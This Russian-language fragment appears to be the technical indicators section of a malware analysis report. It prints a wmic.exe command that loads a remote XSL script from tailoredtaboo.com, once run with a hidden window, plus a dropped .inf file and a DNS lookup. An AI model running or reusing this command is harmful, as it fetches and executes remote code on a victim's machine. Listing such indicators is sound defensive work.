Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' process get brief /format:"https://tailoredtaboo.com/pay.xsl"
- C:\users\public\pay.inf
- DNS ASK ta####edtaboo.com
- '<SYSTEM32>\wbem\wmic.exe' process get brief /format:"https://tailoredtaboo.com/pay.xsl"' (со скрытым окном)